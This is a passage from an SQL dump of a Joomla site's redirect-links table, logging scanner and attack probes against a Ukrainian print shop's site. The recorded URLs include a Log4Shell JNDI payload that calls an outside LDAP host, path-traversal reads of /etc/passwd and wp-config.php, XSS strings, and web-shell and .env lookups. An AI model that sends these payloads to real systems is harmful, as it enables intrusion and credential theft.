00:00:00',301),(21034,'https://ekvatorprint.com.ua/admin/php-ofc-library/ofc_upload_image.php',NULL,'','',1,0,'2021-11-27 19:54:30','0000-00-00 00:00:00',301),(21035,'https://ekvatorprint.com.ua/ofc2/php-ofc-library/ofc_upload_image.php',NULL,'','',1,0,'2021-11-29 11:52:01','0000-00-00 00:00:00',301),(21036,'https://ekvatorprint.com.ua/libs/open-flash-chart/php-ofc-library/ofc_upload_image.php',NULL,'','',1,0,'2021-11-30 12:34:57','0000-00-00 00:00:00',301),(21037,'https://ekvatorprint.com.ua/php-ofc-library/ofc_upload_image.php',NULL,'','',1,0,'2021-12-01 05:17:16','0000-00-00 00:00:00',301),(21038,'https://ekvatorprint.com.ua/nvybarethzgdq7qatb6ftby9eno0',NULL,'','',1,0,'2021-12-01 16:58:21','0000-00-00 00:00:00',301),(21039,'https://ekvatorprint.com.ua/wp2',NULL,'http://ekvatorprint.com.ua/wp2','',4,0,'2021-12-02 05:06:44','0000-00-00 00:00:00',301),(21040,'https://ekvatorprint.com.ua/sitio',NULL,'http://ekvatorprint.com.ua/sitio','',4,0,'2021-12-02 05:06:52','0000-00-00 00:00:00',301),(21041,'https://ekvatorprint.com.ua/sito',NULL,'http://ekvatorprint.com.ua/sito','',4,0,'2021-12-02 05:06:52','0000-00-00 00:00:00',301),(21042,'https://ekvatorprint.com.ua/.ds_store',NULL,'','',4,0,'2021-12-02 22:49:23','0000-00-00 00:00:00',301),(21043,'https://ekvatorprint.com.ua/libraries/gnz11/assets/js/plugins/jquery/file_upload/server/php/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2021-12-06 01:22:26','0000-00-00 00:00:00',301),(21044,'https://ekvatorprint.com.ua/libraries/gnz11/assets/js/plugins/jquery/file_upload/server/php/index_upl.php?file=tf2rghf.jpg',NULL,'','',1,0,'2021-12-06 01:22:28','0000-00-00 00:00:00',301),(21045,'https://ekvatorprint.com.ua/printing-on-caпочта укр нетnvas',NULL,'','',1,0,'2021-12-08 10:27:42','0000-00-00 00:00:00',301),(21046,'https://ekvatorprint.com.ua/assets/images/moduless.php',NULL,'','',2,0,'2021-12-10 01:27:53','0000-00-00 00:00:00',301),(21047,'https://ekvatorprint.com.ua/admin/view/stylesheet/accesson.php',NULL,'','',3,0,'2021-12-11 06:49:25','0000-00-00 00:00:00',301),(21048,'https://ekvatorprint.com.ua/${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:l}${lower:d}${lower:a}${lower:p}}:/67.205.191.102:1389/jxjrbt}}',NULL,'','',1,0,'2021-12-12 09:33:40','0000-00-00 00:00:00',301),(21049,'https://ekvatorprint.com.ua/sites/all/libraries/plupload/examples/upload.php',NULL,'','',2,0,'2021-12-13 16:11:12','0000-00-00 00:00:00',301),(21050,'https://ekvatorprint.com.ua/newsite',NULL,'www.google.com','',1,0,'2021-12-14 06:52:15','0000-00-00 00:00:00',301),(21051,'https://ekvatorprint.com.ua/bkp',NULL,'www.google.com','',1,0,'2021-12-14 06:52:31','0000-00-00 00:00:00',301),(21052,'https://ekvatorprint.com.ua/blogs',NULL,'www.google.com','',1,0,'2021-12-14 06:52:35','0000-00-00 00:00:00',301),(21053,'https://ekvatorprint.com.ua/bkp2',NULL,'www.google.com','',1,0,'2021-12-14 06:52:39','0000-00-00 00:00:00',301),(21054,'https://ekvatorprint.com.ua/2021wp',NULL,'www.google.com','',1,0,'2021-12-14 06:52:49','0000-00-00 00:00:00',301),(21055,'https://ekvatorprint.com.ua/sqlbuddy/login.php',NULL,'','',2,0,'2021-12-14 22:21:48','0000-00-00 00:00:00',301),(21056,'https://ekvatorprint.com.ua/chjpbnrpbm',NULL,'','',1,0,'2021-12-15 10:55:53','0000-00-00 00:00:00',301),(21057,'https://ekvatorprint.com.ua/components/com_hotornot2/hotornot2.php',NULL,'','',1,0,'2021-12-17 12:44:41','0000-00-00 00:00:00',301),(21058,'https://ekvatorprint.com.ua/components/com_resources/controller.php',NULL,'','',1,0,'2021-12-18 11:19:31','0000-00-00 00:00:00',301),(21059,'https://ekvatorprint.com.ua/index.php?option=com_fabrik&c=import&view=import',NULL,'','',2,0,'2021-12-19 01:28:50','0000-00-00 00:00:00',301),(21060,'https://ekvatorprint.com.ua/components/com_supergroups/uploadvideo/upload.php',NULL,'','',1,0,'2021-12-19 08:14:49','0000-00-00 00:00:00',301),(21061,'https://ekvatorprint.com.ua/components/com_jaggyblog/controller.php',NULL,'','',1,0,'2021-12-19 17:12:32','0000-00-00 00:00:00',301),(21062,'https://ekvatorprint.com.ua/components/com_registrationpro/controller.php',NULL,'','',1,0,'2021-12-20 13:58:51','0000-00-00 00:00:00',301),(21063,'https://ekvatorprint.com.ua/ckeditor/config.js',NULL,'','',1,0,'2021-12-22 07:34:31','0000-00-00 00:00:00',301),(21064,'https://ekvatorprint.com.ua/app_master/m/telerik.web.ui.dialoghandler.aspx',NULL,'http://ekvatorprint.com.ua/App_Master/m/Telerik.Web.UI.DialogHandler.aspx','',1,0,'2021-12-22 18:54:50','0000-00-00 00:00:00',301),(21065,'https://ekvatorprint.com.ua/components/com_jumi/jumi.php',NULL,'','',1,0,'2021-12-22 19:33:38','0000-00-00 00:00:00',301),(21066,'https://ekvatorprint.com.ua/telerik.web.ui.dialoghandler.axd',NULL,'http://ekvatorprint.com.ua/Telerik.Web.UI.DialogHandler.axd','',1,0,'2021-12-22 20:43:17','0000-00-00 00:00:00',301),(21067,'https://ekvatorprint.com.ua/index3.php',NULL,'','',2,0,'2021-12-23 08:18:00','0000-00-00 00:00:00',301),(21068,'https://ekvatorprint.com.ua/public/assets/jquery-file-upload/server/php/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2021-12-23 14:56:29','0000-00-00 00:00:00',301),(21069,'https://ekvatorprint.com.ua/components/com_fabrik/controller.php',NULL,'','',1,0,'2021-12-23 23:32:55','0000-00-00 00:00:00',301),(21070,'https://ekvatorprint.com.ua/wp-includes/wp-atom.php',NULL,'www.google.com','',23,0,'2021-12-24 09:00:50','0000-00-00 00:00:00',301),(21071,'https://ekvatorprint.com.ua/installation/',NULL,'https://ekvatorprint.com.ua/robots.txt','',5,0,'2021-12-24 20:51:31','0000-00-00 00:00:00',301),(21072,'https://ekvatorprint.com.ua/components/com_chronocontact/libraries/chronoform.php',NULL,'','',1,0,'2021-12-25 00:51:31','0000-00-00 00:00:00',301),(21073,'https://ekvatorprint.com.ua/public/assets/global/plugins/jquery-file-upload/server/php/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2021-12-25 07:56:38','0000-00-00 00:00:00',301),(21074,'https://ekvatorprint.com.ua/~app/.env',NULL,'','',2,0,'2021-12-25 10:50:11','0000-00-00 00:00:00',301),(21075,'https://ekvatorprint.com.ua/assets/images/utility.php',NULL,'','',3,0,'2021-12-25 21:02:46','0000-00-00 00:00:00',301),(21076,'https://ekvatorprint.com.ua/cache/index3.php',NULL,'','',4,0,'2021-12-25 23:18:26','0000-00-00 00:00:00',301),(21077,'https://ekvatorprint.com.ua/components/com_dtregister/controller.php',NULL,'','',1,0,'2021-12-26 22:39:59','0000-00-00 00:00:00',301),(21078,'https://ekvatorprint.com.ua/public/plugins/jquery-file-upload/server/php/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2021-12-27 05:26:33','0000-00-00 00:00:00',301),(21079,'https://ekvatorprint.com.ua/components/com_hwdvideoshare/controller.php',NULL,'','',1,0,'2021-12-28 03:20:58','0000-00-00 00:00:00',301),(21080,'https://ekvatorprint.com.ua/alfa_data/alfacgiapi/perl.alfa',NULL,'www.google.com','',41,0,'2021-12-28 16:01:26','0000-00-00 00:00:00',301),(21081,'https://ekvatorprint.com.ua/alfa_data/alfacgiapi/bash.alfa',NULL,'www.google.com','',4,0,'2021-12-28 16:01:54','0000-00-00 00:00:00',301),(21082,'https://ekvatorprint.com.ua/alfa_data/alfacgiapi/py.alfa',NULL,'www.google.com','',4,0,'2021-12-28 16:02:22','0000-00-00 00:00:00',301),(21083,'https://ekvatorprint.com.ua/alfacgiapi/perl.alfa',NULL,'www.google.com','',41,0,'2021-12-28 16:02:49','0000-00-00 00:00:00',301),(21084,'https://ekvatorprint.com.ua/alfacgiapi/bash.alfa',NULL,'www.google.com','',4,0,'2021-12-28 16:03:16','0000-00-00 00:00:00',301),(21085,'https://ekvatorprint.com.ua/alfacgiapi/py.alfa',NULL,'www.google.com','',4,0,'2021-12-28 16:03:43','0000-00-00 00:00:00',301),(21086,'https://ekvatorprint.com.ua/alfa_data/cgialfa/perl.alfa',NULL,'www.google.com','',2,0,'2021-12-28 16:04:33','0000-00-00 00:00:00',301),(21087,'https://ekvatorprint.com.ua/alfa_data/cgialfa/bash.alfa',NULL,'www.google.com','',2,0,'2021-12-28 16:04:56','0000-00-00 00:00:00',301),(21088,'https://ekvatorprint.com.ua/alfa_data/cgialfa/py.alfa',NULL,'www.google.com','',2,0,'2021-12-28 16:05:27','0000-00-00 00:00:00',301),(21089,'https://ekvatorprint.com.ua/wp-content/uploads/alfa_data/alfacgiapi/perl.alfa',NULL,'www.google.com','',5,0,'2021-12-28 16:14:03','0000-00-00 00:00:00',301),(21090,'https://ekvatorprint.com.ua/wp-content/uploads/alfa_data/alfacgiapi/bash.alfa',NULL,'www.google.com','',3,0,'2021-12-28 16:14:26','0000-00-00 00:00:00',301),(21091,'https://ekvatorprint.com.ua/wp-includes/alfa_data/alfacgiapi/perl.alfa',NULL,'www.google.com','',3,0,'2021-12-28 16:14:47','0000-00-00 00:00:00',301),(21092,'https://ekvatorprint.com.ua/wp-includes/alfa_data/alfacgiapi/bash.alfa',NULL,'www.google.com','',3,0,'2021-12-28 16:15:09','0000-00-00 00:00:00',301),(21093,'https://ekvatorprint.com.ua/wp-includes/alfa_data/alfacgiapi/py.alfa',NULL,'www.google.com','',3,0,'2021-12-28 16:15:33','0000-00-00 00:00:00',301),(21094,'https://ekvatorprint.com.ua/wp-includes/alfacgiapi/perl.alfa',NULL,'www.google.com','',3,0,'2021-12-28 16:15:56','0000-00-00 00:00:00',301),(21095,'https://ekvatorprint.com.ua/wp-includes/alfacgiapi/bash.alfa',NULL,'www.google.com','',3,0,'2021-12-28 16:16:20','0000-00-00 00:00:00',301),(21096,'https://ekvatorprint.com.ua/wp-includes/alfacgiapi/py.alfa',NULL,'www.google.com','',3,0,'2021-12-28 16:16:42','0000-00-00 00:00:00',301),(21097,'https://ekvatorprint.com.ua/wp-includes/alfa_data/cgialfa/perl.alfa',NULL,'www.google.com','',1,0,'2021-12-28 16:17:07','0000-00-00 00:00:00',301),(21098,'https://ekvatorprint.com.ua/wp-includes/alfa_data/cgialfa/bash.alfa',NULL,'www.google.com','',1,0,'2021-12-28 16:17:29','0000-00-00 00:00:00',301),(21099,'https://ekvatorprint.com.ua/wp-includes/alfa_data/cgialfa/py.alfa',NULL,'www.google.com','',1,0,'2021-12-28 16:17:53','0000-00-00 00:00:00',301),(21100,'https://ekvatorprint.com.ua/uploads/alfa_data/alfacgiapi/perl.alfa',NULL,'www.google.com','',1,0,'2021-12-28 16:18:13','0000-00-00 00:00:00',301),(21101,'https://ekvatorprint.com.ua/uploads/alfa_data/alfacgiapi/bash.alfa',NULL,'www.google.com','',1,0,'2021-12-28 16:18:35','0000-00-00 00:00:00',301),(21102,'https://ekvatorprint.com.ua/uploads/alfa_data/alfacgiapi/py.alfa',NULL,'www.google.com','',1,0,'2021-12-28 16:18:57','0000-00-00 00:00:00',301),(21103,'https://ekvatorprint.com.ua/uploads/alfacgiapi/perl.alfa',NULL,'www.google.com','',1,0,'2021-12-28 16:19:19','0000-00-00 00:00:00',301),(21104,'https://ekvatorprint.com.ua/uploads/alfacgiapi/bash.alfa',NULL,'www.google.com','',1,0,'2021-12-28 16:19:42','0000-00-00 00:00:00',301),(21105,'https://ekvatorprint.com.ua/uploads/alfacgiapi/py.alfa',NULL,'www.google.com','',1,0,'2021-12-28 16:20:05','0000-00-00 00:00:00',301),(21106,'https://ekvatorprint.com.ua/uploads/alfa_data/cgialfa/perl.alfa',NULL,'www.google.com','',1,0,'2021-12-28 16:20:26','0000-00-00 00:00:00',301),(21107,'https://ekvatorprint.com.ua/uploads/alfa_data/cgialfa/bash.alfa',NULL,'www.google.com','',1,0,'2021-12-28 16:20:49','0000-00-00 00:00:00',301),(21108,'https://ekvatorprint.com.ua/uploads/alfa_data/cgialfa/py.alfa',NULL,'www.google.com','',1,0,'2021-12-28 16:21:12','0000-00-00 00:00:00',301),(21109,'https://ekvatorprint.com.ua/admin/uploads/alfa_data/alfacgiapi/perl.alfa',NULL,'www.google.com','',1,0,'2021-12-28 16:21:37','0000-00-00 00:00:00',301),(21110,'https://ekvatorprint.com.ua/admin/uploads/alfa_data/alfacgiapi/bash.alfa',NULL,'www.google.com','',1,0,'2021-12-28 16:21:58','0000-00-00 00:00:00',301),(21111,'https://ekvatorprint.com.ua/admin/uploads/alfa_data/alfacgiapi/py.alfa',NULL,'www.google.com','',1,0,'2021-12-28 16:22:19','0000-00-00 00:00:00',301),(21112,'https://ekvatorprint.com.ua/wp-admin/includes/alfa_data/alfacgiapi/perl.alfa',NULL,'www.google.com','',1,0,'2021-12-28 16:22:49','0000-00-00 00:00:00',301),(21113,'https://ekvatorprint.com.ua/wp-admin/includes/alfa_data/alfacgiapi/bash.alfa',NULL,'www.google.com','',1,0,'2021-12-28 16:23:13','0000-00-00 00:00:00',301),(21114,'https://ekvatorprint.com.ua/wp-admin/includes/alfa_data/alfacgiapi/py.alfa',NULL,'www.google.com','',1,0,'2021-12-28 16:23:36','0000-00-00 00:00:00',301),(21115,'https://ekvatorprint.com.ua/wp-admin/includes/alfacgiapi/perl.alfa',NULL,'www.google.com','',1,0,'2021-12-28 16:24:14','0000-00-00 00:00:00',301),(21116,'https://ekvatorprint.com.ua/wp-admin/includes/alfacgiapi/bash.alfa',NULL,'www.google.com','',1,0,'2021-12-28 16:24:32','0000-00-00 00:00:00',301),(21117,'https://ekvatorprint.com.ua/wp-admin/includes/alfacgiapi/py.alfa',NULL,'www.google.com','',1,0,'2021-12-28 16:24:48','0000-00-00 00:00:00',301),(21118,'https://ekvatorprint.com.ua/wp-admin/includes/alfa_data/cgialfa/perl.alfa',NULL,'www.google.com','',1,0,'2021-12-28 16:25:08','0000-00-00 00:00:00',301),(21119,'https://ekvatorprint.com.ua/wp-admin/includes/alfa_data/cgialfa/bash.alfa',NULL,'www.google.com','',1,0,'2021-12-28 16:25:31','0000-00-00 00:00:00',301),(21120,'https://ekvatorprint.com.ua/wp-admin/includes/alfa_data/cgialfa/py.alfa',NULL,'www.google.com','',1,0,'2021-12-28 16:25:55','0000-00-00 00:00:00',301);
INSERT INTO `j25_redirect_links` VALUES (21121,'https://ekvatorprint.com.ua/demo/server/php/index.php',NULL,'','',2,0,'2021-12-28 16:48:54','0000-00-00 00:00:00',301),(21122,'https://ekvatorprint.com.ua/wp-content/themes/sketch/content-sample.php',NULL,'','',1,0,'2021-12-28 19:45:26','0000-00-00 00:00:00',301),(21123,'https://ekvatorprint.com.ua/wp/wp-content/themes/sketch/content-sample.php',NULL,'','',1,0,'2021-12-28 19:45:27','0000-00-00 00:00:00',301),(21124,'https://ekvatorprint.com.ua/wordpress/wp-content/themes/sketch/content-sample.php',NULL,'','',1,0,'2021-12-28 19:45:28','0000-00-00 00:00:00',301),(21125,'https://ekvatorprint.com.ua/blog/wp-content/themes/sketch/content-sample.php',NULL,'','',1,0,'2021-12-28 19:45:29','0000-00-00 00:00:00',301),(21126,'https://ekvatorprint.com.ua/site/wp-content/themes/sketch/content-sample.php',NULL,'','',1,0,'2021-12-28 19:45:31','0000-00-00 00:00:00',301),(21127,'https://ekvatorprint.com.ua/js/ckeditor/ckupload.php',NULL,'','',1,0,'2021-12-29 13:37:45','0000-00-00 00:00:00',301),(21128,'https://ekvatorprint.com.ua/components/com_jombib/jombib.html.php',NULL,'','',1,0,'2021-12-29 23:46:21','0000-00-00 00:00:00',301),(21129,'https://ekvatorprint.com.ua/mt/',NULL,'','',3,0,'2021-12-30 08:17:44','0000-00-00 00:00:00',301),(21130,'https://ekvatorprint.com.ua/alfa_data/alfacgiapi/',NULL,'','',2,0,'2021-12-30 08:17:46','0000-00-00 00:00:00',301),(21131,'https://ekvatorprint.com.ua/wp-content/uploads/2021/12/up.php',NULL,'','',2,0,'2021-12-30 08:17:49','0000-00-00 00:00:00',301),(21132,'https://ekvatorprint.com.ua/wp-content/alfa_data/alfacgiapi/',NULL,'','',2,0,'2021-12-30 08:17:50','0000-00-00 00:00:00',301),(21133,'https://ekvatorprint.com.ua/shells.php',NULL,'','',17,0,'2021-12-30 08:17:53','0000-00-00 00:00:00',301),(21134,'https://ekvatorprint.com.ua/wp-admin/alfa.php',NULL,'','',2,0,'2021-12-30 08:17:56','0000-00-00 00:00:00',301),(21135,'https://ekvatorprint.com.ua/wp-includes/fw.php',NULL,'','',4,0,'2021-12-30 08:17:59','0000-00-00 00:00:00',301),(21136,'https://ekvatorprint.com.ua/wp-content/fw.php',NULL,'','',12,0,'2021-12-30 08:18:01','0000-00-00 00:00:00',301),(21137,'https://ekvatorprint.com.ua/wp-admin/fw.php',NULL,'','',6,0,'2021-12-30 08:18:02','0000-00-00 00:00:00',301),(21138,'https://ekvatorprint.com.ua/wp-content/uploads/2021/12/fw.php',NULL,'','',2,0,'2021-12-30 08:18:04','0000-00-00 00:00:00',301),(21139,'https://ekvatorprint.com.ua/wp-includes/wso.php',NULL,'','',2,0,'2021-12-30 08:18:06','0000-00-00 00:00:00',301),(21140,'https://ekvatorprint.com.ua/wp-content/wso.php',NULL,'','',2,0,'2021-12-30 08:18:07','0000-00-00 00:00:00',301),(21141,'https://ekvatorprint.com.ua/wp-admin/wso.php',NULL,'','',2,0,'2021-12-30 08:18:09','0000-00-00 00:00:00',301),(21142,'https://ekvatorprint.com.ua/fw.php',NULL,'','',19,0,'2021-12-30 08:18:14','0000-00-00 00:00:00',301),(21143,'https://ekvatorprint.com.ua/ckupload.php',NULL,'','',1,0,'2021-12-30 09:06:23','0000-00-00 00:00:00',301),(21144,'https://ekvatorprint.com.ua/admin/ckupload.php',NULL,'','',1,0,'2021-12-30 13:41:26','0000-00-00 00:00:00',301),(21145,'https://ekvatorprint.com.ua/js/app.js',NULL,'','',1,0,'2021-12-31 22:26:08','0000-00-00 00:00:00',301),(21146,'https://ekvatorprint.com.ua/.svn/entries',NULL,'','',1,0,'2022-01-01 09:29:30','0000-00-00 00:00:00',301),(21147,'https://ekvatorprint.com.ua/mt/mt-xmlrpc.cgi',NULL,'https://www.google.com/','',4,0,'2022-01-02 13:10:18','0000-00-00 00:00:00',301),(21148,'https://ekvatorprint.com.ua/lvlzea1reyhmwkvv1',NULL,'','',1,0,'2022-01-03 18:00:26','0000-00-00 00:00:00',301),(21149,'https://ekvatorprint.com.ua/src/app.js',NULL,'','',1,0,'2022-01-03 22:03:13','0000-00-00 00:00:00',301),(21150,'https://ekvatorprint.com.ua/server/php/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2022-01-04 09:35:41','0000-00-00 00:00:00',301),(21151,'https://ekvatorprint.com.ua/dist/app.js',NULL,'','',1,0,'2022-01-05 20:00:16','0000-00-00 00:00:00',301),(21152,'https://ekvatorprint.com.ua/assets/js/app.js',NULL,'','',1,0,'2022-01-05 20:10:20','0000-00-00 00:00:00',301),(21153,'https://ekvatorprint.com.ua/file-upload/server/php/index.php?file=tf2rghf.jpg',NULL,'','',2,0,'2022-01-06 04:25:25','0000-00-00 00:00:00',301),(21154,'https://ekvatorprint.com.ua/sphinx.conf',NULL,'','',1,0,'2022-01-06 10:06:16','0000-00-00 00:00:00',301),(21155,'https://ekvatorprint.com.ua/app.js',NULL,'','',1,0,'2022-01-06 11:26:46','0000-00-00 00:00:00',301),(21156,'https://ekvatorprint.com.ua/themes/assets/plugins/jquery-file-upload/server/php/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2022-01-08 04:02:06','0000-00-00 00:00:00',301),(21157,'https://ekvatorprint.com.ua/resources/js/app.js',NULL,'','',1,0,'2022-01-08 04:11:50','0000-00-00 00:00:00',301),(21158,'https://ekvatorprint.com.ua/assets/vendor/server/php/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2022-01-08 14:00:37','0000-00-00 00:00:00',301),(21159,'https://ekvatorprint.com.ua/test_404_page/',NULL,'','',10,0,'2022-01-09 03:43:32','0000-00-00 00:00:00',301),(21160,'https://ekvatorprint.com.ua/ отзывы',NULL,'','',1,0,'2022-01-10 10:44:41','0000-00-00 00:00:00',301),(21161,'https://ekvatorprint.com.ua/wp-content/uploads/alfacgiapi/perl.alfa',NULL,'www.google.com','',2,0,'2022-01-10 20:05:50','0000-00-00 00:00:00',301),(21162,'https://ekvatorprint.com.ua/wp-content/plugins/image-hover-effects-ultimate/assets/backend/js/admin-notice.js',NULL,'','',2,0,'2022-01-11 11:31:39','0000-00-00 00:00:00',301),(21163,'https://ekvatorprint.com.ua/media/com_acym/',NULL,'','',1,0,'2022-01-12 02:13:28','0000-00-00 00:00:00',301),(21164,'https://ekvatorprint.com.ua/application/configs/application.ini',NULL,'','',1,0,'2022-01-15 12:09:03','0000-00-00 00:00:00',301),(21165,'https://ekvatorprint.com.ua/view-source:',NULL,'','',5,0,'2022-01-16 12:30:38','0000-00-00 00:00:00',301),(21166,'https://ekvatorprint.com.ua/misc/ajax.js',NULL,'','',5,0,'2022-01-16 12:30:39','0000-00-00 00:00:00',301),(21167,'https://ekvatorprint.com.ua/imam_bro.gif',NULL,'bing.com','',1,0,'2022-01-16 20:07:44','0000-00-00 00:00:00',301),(21168,'https://ekvatorprint.com.ua/images/imam_bro.gif',NULL,'bing.com','',1,0,'2022-01-16 20:07:44','0000-00-00 00:00:00',301),(21169,'https://ekvatorprint.com.ua/images/xxx.gif',NULL,'bing.com','',2,0,'2022-01-18 00:13:57','0000-00-00 00:00:00',301),(21170,'https://ekvatorprint.com.ua/nietklikken.gif',NULL,'bing.com','',2,0,'2022-01-18 00:13:58','0000-00-00 00:00:00',301),(21171,'https://ekvatorprint.com.ua/rsd.xml',NULL,'','',1,0,'2022-01-19 14:01:04','0000-00-00 00:00:00',301),(21172,'https://ekvatorprint.com.ua/cmt/',NULL,'','',1,0,'2022-01-19 14:01:11','0000-00-00 00:00:00',301),(21173,'https://ekvatorprint.com.ua/mt4/',NULL,'','',1,0,'2022-01-19 14:01:14','0000-00-00 00:00:00',301),(21174,'https://ekvatorprint.com.ua/mt.js',NULL,'','',1,0,'2022-01-19 14:01:18','0000-00-00 00:00:00',301),(21175,'https://ekvatorprint.com.ua/tiny_mce/plugins/tinybrowser/tinybrowser.php',NULL,'','',1,0,'2022-01-24 10:34:01','0000-00-00 00:00:00',301),(21176,'https://ekvatorprint.com.ua/admin/includes/javascript/tiny_mce/plugins/tinybrowser/tinybrowser.php',NULL,'','',1,0,'2022-01-24 13:54:04','0000-00-00 00:00:00',301),(21177,'https://ekvatorprint.com.ua/index.php?option=com_arttcym&ctrl=frontmails&task=setnewiconshare',NULL,'','',1,0,'2022-01-26 07:29:30','0000-00-00 00:00:00',301),(21178,'https://ekvatorprint.com.ua/media/com_acym/upload/socials/',NULL,'','',1,0,'2022-01-26 11:15:01','0000-00-00 00:00:00',301),(21179,'https://ekvatorprint.com.ua/assets/plugins/fileupload/server/php/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2022-03-20 11:18:38','0000-00-00 00:00:00',301),(21180,'https://ekvatorprint.com.ua/sistem.php',NULL,'','',3,0,'2022-03-20 14:40:08','0000-00-00 00:00:00',301),(21181,'https://ekvatorprint.com.ua/env.bak',NULL,'','',16,0,'2022-03-21 01:34:36','0000-00-00 00:00:00',301),(21182,'https://ekvatorprint.com.ua/old/.env',NULL,'','',18,0,'2022-03-21 01:34:51','0000-00-00 00:00:00',301),(21183,'https://ekvatorprint.com.ua/www/.env',NULL,'','',16,0,'2022-03-21 01:35:00','0000-00-00 00:00:00',301),(21184,'https://ekvatorprint.com.ua/crm/.env',NULL,'','',18,0,'2022-03-21 01:35:02','0000-00-00 00:00:00',301),(21185,'https://ekvatorprint.com.ua/2021/wp-includes/wlwmanifest.xml',NULL,'','',15,0,'2022-03-21 14:58:28','0000-00-00 00:00:00',301),(21186,'https://ekvatorprint.com.ua/tt',NULL,'','',1,0,'2022-03-21 15:44:13','0000-00-00 00:00:00',301),(21187,'https://ekvatorprint.com.ua/admin/fileupload/server/php/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2022-03-22 23:05:07','0000-00-00 00:00:00',301),(21188,'https://ekvatorprint.com.ua/\\u001b]8;;https:/example.com\"/onmouseover=\"alert(1)\\u0007example\\u001b]8;;\\u0007',NULL,'','',1,0,'2022-03-23 03:54:56','0000-00-00 00:00:00',301),(21189,'https://ekvatorprint.com.ua/index.php?option=com_orgchart&controller=../../../../../../../../../../etc/passwd\0',NULL,'','',1,0,'2022-03-23 04:55:14','0000-00-00 00:00:00',301),(21190,'https://ekvatorprint.com.ua/compress.php?file=../../../../../../../etc/passwd',NULL,'','',1,0,'2022-03-23 04:55:15','0000-00-00 00:00:00',301),(21191,'https://ekvatorprint.com.ua/index.php?option=com_jresearch&controller=../../../../../../../../etc/passwd\0',NULL,'','',1,0,'2022-03-23 04:55:15','0000-00-00 00:00:00',301),(21192,'https://ekvatorprint.com.ua/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../wp-config.php',NULL,'','',1,0,'2022-03-23 04:55:16','0000-00-00 00:00:00',301),(21193,'https://ekvatorprint.com.ua/appliance/login.ns?login[password]=test\"><svg/onload=alert(document.domain)>&login[use_curr]=1&login[submit]=change password',NULL,'','',1,0,'2022-03-23 04:55:17','0000-00-00 00:00:00',301),(21194,'https://ekvatorprint.com.ua/wavemaker/studioservice.download?method=getcontent&inurl=file///etc/passwd',NULL,'','',1,0,'2022-03-23 04:55:18','0000-00-00 00:00:00',301),(21195,'https://ekvatorprint.com.ua/ftb.imagegallery.aspx',NULL,'','',1,0,'2022-03-23 04:55:20','0000-00-00 00:00:00',301),(21196,'https://ekvatorprint.com.ua/cache/backup/',NULL,'','',1,0,'2022-03-23 04:55:21','0000-00-00 00:00:00',301),(21197,'https://ekvatorprint.com.ua/<script>alert(document.domain)</script>',NULL,'','',1,0,'2022-03-23 04:55:21','0000-00-00 00:00:00',301),(21198,'https://ekvatorprint.com.ua/druid/indexer/v1/sampler?for=connect',NULL,'','',1,0,'2022-03-23 04:55:24','0000-00-00 00:00:00',301),(21199,'https://ekvatorprint.com.ua/public/login.htm?type=probes',NULL,'','',1,0,'2022-03-23 04:55:40','0000-00-00 00:00:00',301),(21200,'https://ekvatorprint.com.ua/public/login.htm?type=requests',NULL,'','',1,0,'2022-03-23 04:55:41','0000-00-00 00:00:00',301),(21201,'https://ekvatorprint.com.ua/system/sharedir.php',NULL,'','',1,0,'2022-03-23 08:01:33','0000-00-00 00:00:00',301),(21202,'https://ekvatorprint.com.ua/en/php/usb_sync.php',NULL,'','',1,0,'2022-03-23 08:01:36','0000-00-00 00:00:00',301),(21203,'https://ekvatorprint.com.ua/os/mxperson',NULL,'','',1,0,'2022-03-23 08:04:52','0000-00-00 00:00:00',301),(21204,'https://ekvatorprint.com.ua/meaweb/os/mxperson',NULL,'','',1,0,'2022-03-23 08:04:54','0000-00-00 00:00:00',301),(21205,'https://ekvatorprint.com.ua/app/kibana/',NULL,'','',1,0,'2022-03-23 08:05:27','0000-00-00 00:00:00',301),(21206,'https://ekvatorprint.com.ua/backs/',NULL,'','',1,0,'2022-03-23 11:16:33','0000-00-00 00:00:00',301),(21207,'https://ekvatorprint.com.ua/backups/',NULL,'','',1,0,'2022-03-23 11:16:33','0000-00-00 00:00:00',301),(21208,'https://ekvatorprint.com.ua/admin/backups/',NULL,'','',1,0,'2022-03-23 11:16:33','0000-00-00 00:00:00',301),(21209,'https://ekvatorprint.com.ua/var/',NULL,'','',1,0,'2022-03-23 11:16:33','0000-00-00 00:00:00',301),(21210,'https://ekvatorprint.com.ua/123/',NULL,'','',1,0,'2022-03-23 11:16:34','0000-00-00 00:00:00',301),(21211,'https://ekvatorprint.com.ua/tests/',NULL,'','',1,0,'2022-03-23 11:16:34','0000-00-00 00:00:00',301),(21212,'https://ekvatorprint.com.ua/!backups/',NULL,'','',1,0,'2022-03-23 11:16:35','0000-00-00 00:00:00',301),(21213,'https://ekvatorprint.com.ua/_backup/',NULL,'','',1,0,'2022-03-23 11:16:35','0000-00-00 00:00:00',301),(21214,'https://ekvatorprint.com.ua/!backup/',NULL,'','',1,0,'2022-03-23 11:16:35','0000-00-00 00:00:00',301),(21215,'https://ekvatorprint.com.ua/_backups/',NULL,'','',1,0,'2022-03-23 11:16:36','0000-00-00 00:00:00',301),(21216,'https://ekvatorprint.com.ua/_test/',NULL,'','',1,0,'2022-03-23 11:16:36','0000-00-00 00:00:00',301),(21217,'https://ekvatorprint.com.ua/_backup_/',NULL,'','',1,0,'2022-03-23 11:16:36','0000-00-00 00:00:00',301),(21218,'https://ekvatorprint.com.ua/.backup/',NULL,'','',1,0,'2022-03-23 11:16:36','0000-00-00 00:00:00',301),(21219,'https://ekvatorprint.com.ua/backup1/',NULL,'','',1,0,'2022-03-23 11:16:37','0000-00-00 00:00:00',301),(21220,'https://ekvatorprint.com.ua/dbs/',NULL,'','',1,0,'2022-03-23 11:16:37','0000-00-00 00:00:00',301),(21221,'https://ekvatorprint.com.ua/db_backup/',NULL,'','',1,0,'2022-03-23 11:16:37','0000-00-00 00:00:00',301),(21222,'https://ekvatorprint.com.ua/db_backups/',NULL,'','',1,0,'2022-03-23 11:16:38','0000-00-00 